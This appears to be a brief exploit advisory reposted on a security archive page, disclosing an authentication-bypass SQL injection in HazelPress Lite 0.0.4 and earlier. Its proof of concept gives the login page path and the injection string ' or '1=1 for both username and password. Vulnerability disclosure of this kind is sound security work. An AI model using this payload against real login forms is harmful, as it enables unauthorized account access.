HazelPress Lite versions 0.0.4 and below suffer from a remote SQL injection vulnerability that allows for authentication bypass.
3c2b319a83a458f6aabcf60ecdbbef95# HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: http://hazelpress.org/index.php?hazel=downloads
# PoC: [path]/login.php
# Username: ' or '1=1
# password: ' or '1=1
Comments
No comments yet, be the first!